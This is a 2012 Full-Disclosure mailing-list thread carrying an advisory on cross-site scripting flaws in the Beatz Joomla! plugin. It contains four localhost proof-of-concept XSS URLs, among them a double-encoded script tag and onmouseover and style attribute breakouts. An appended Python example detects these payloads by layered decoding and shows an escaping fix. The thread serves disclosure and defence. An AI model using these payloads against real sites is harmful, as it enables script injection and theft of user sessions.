Re: [Full-disclosure] Joomla! Plugin - Beatz 1.x <= Multiple Cross Site Scripting Vulnerabilities

2012-04-16 Thread David3 Gonnella
poc on localhost is a bit unreachable...  fbvfdjkh3ruifwqebdf



On 04/15/12 18:39, YGN Ethical Hacker Group wrote:



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Joomla! Plugin - Beatz 1.x <= Multiple Cross Site Scripting Vulnerabilities

2012-04-16 Thread YGN Ethical Hacker Group
1. OVERVIEW

Beatz 1.x versions are vulnerable to Cross Site Scripting.


2. BACKGROUND

Beatz is a set of powerful Social Networking Script Joomla! 1.5
plugins that allow you to start your own favourite artist band
website. Although it is just a Joomla! plugin, it comes with the full
Joomla! bundle for ease of use and installation.


3. VULNERABILITY DESCRIPTION

Multiple parameters were not properly sanitized upon submission, which
allows an attacker to conduct a Cross Site Scripting attack. This may allow
an attacker to create a specially crafted URL that would execute
arbitrary script code in a victim's browser. The vulnerable plugins
include: com_find, com_charts and com_videos.


4. VERSIONS AFFECTED

Tested in 1.x versions


5. PROOF-OF-CONCEPT/EXPLOIT

== Generic Joomla! 1.5 Double Encoding XSS

http://localhost/beatz/?option=com_content&view=frontpage&limitstart=5&%2522%253e%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2f%2558%2553%2553%2f%2529%253c%2f%2573%2563%2572%2569%2570%2574%253e=1

== com_charts (parameter: do)

http://localhost/beatz/index.php?option=com_charts&view=charts&Itemid=76&chartkeyword=Acoustic&do=all%22%20style%3dbackground-image:url('javascript:alert(/XSS/)');width:1000px;height:1000px;display:block;"%20x=%22&option=com_charts

== com_find (parameter: keyword)

http://localhost/beatz/index.php?do=listAll&keyword=++Search";>&option=com_find

== com_videos (parameter: video_keyword)

http://localhost/beatz/index.php?option=com_videos&view=videos&Itemid=59&video_keyword="+style="width:1000px;height:1000px;position:absolute;left:0;top:0"+onmouseover="alert(/xss/)&search=Search


6. SOLUTION

The vendor hasn't released a fix yet.


7. VENDOR

Cogzidel Technologies Pvt Ltd.
http://www.cogzidel.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-03-01: notified vendor
2012-04-15: vulnerability disclosed


10. REFERENCES

Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bbeatz_1.x%5D_xss

#yehg [2012-04-15]

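As an added example (not part of the advisory, nor Beatz or Joomla! code), a small Python detector that decodes each query parameter repeatedly, so the double-encoded Joomla! 1.5 payload above is only caught at decode depth 1 while the com_videos attribute breakout is caught at depth 0, followed by the attribute-escaping fix that the vendor had not shipped. The sample URLs are constructed from the PoCs above; MARKERS, MAX_EXTRA_DECODES and the function names are assumptions of this example.

```python
import html
import re
from urllib.parse import parse_qsl, unquote

# Context-breakout markers: script tag, event handler, style attr, javascript: URL, quote then '>'.
MARKERS = re.compile(
    r'<\s*/?\s*script|on[a-z]+\s*=|style\s*=|javascript\s*:|["\']\s*>',
    re.IGNORECASE)
MAX_EXTRA_DECODES = 3  # layers of percent-encoding to peel beyond the first

# Constructed samples modelled on the advisory's PoC URLs (not real traffic).
SAMPLE_URLS = {
    "double_encoded": "http://localhost/beatz/?option=com_content&limitstart=5"
    "&%2522%253e%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572"
    "%2574%2528%2f%2558%2553%2553%2f%2529%253c%2f%2573%2563%2572%2569%2570"
    "%2574%253e=1",
    "attr_breakout": "http://localhost/beatz/index.php?option=com_videos"
    '&video_keyword="+style="width:1000px"+onmouseover="alert(/xss/)&search=Go',
    "benign": "http://localhost/beatz/index.php?do=listAll&keyword=Acoustic+band",
}

def decode_layers(text):
    """Successive percent-decodings of text; element 0 is text itself."""
    layers = [text]
    for _ in range(MAX_EXTRA_DECODES):
        nxt = unquote(layers[-1])
        if nxt == layers[-1]:
            break
        layers.append(nxt)
    return layers

def inspect_url(url):
    """(param_name, depth, decoded_text) per flagged parameter. parse_qsl decodes
    once, so depth 0 is a plain payload and depth 1 the double-encoded Joomla! 1.5
    case. Names are inspected too: the generic PoC hides its payload in a name."""
    query = url.split("?", 1)[1] if "?" in url else ""
    findings = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        for field in (name, value):
            for depth, text in enumerate(decode_layers(field)):
                if MARKERS.search(text):
                    findings.append((name, depth, text))
                    break
    return findings

def render_search_box(keyword):
    """Hardened echo of a keyword into a quoted value attribute: escaping the quote
    stops the value closing the attribute and adding style= or onmouseover=."""
    return '<input type="text" name="keyword" value="%s">' % html.escape(keyword, quote=True)
```

A WAF or log pipeline that decodes only once sees the first URL's payload as harmless hex, which is why the depth of the first hit is reported alongside the decoded text.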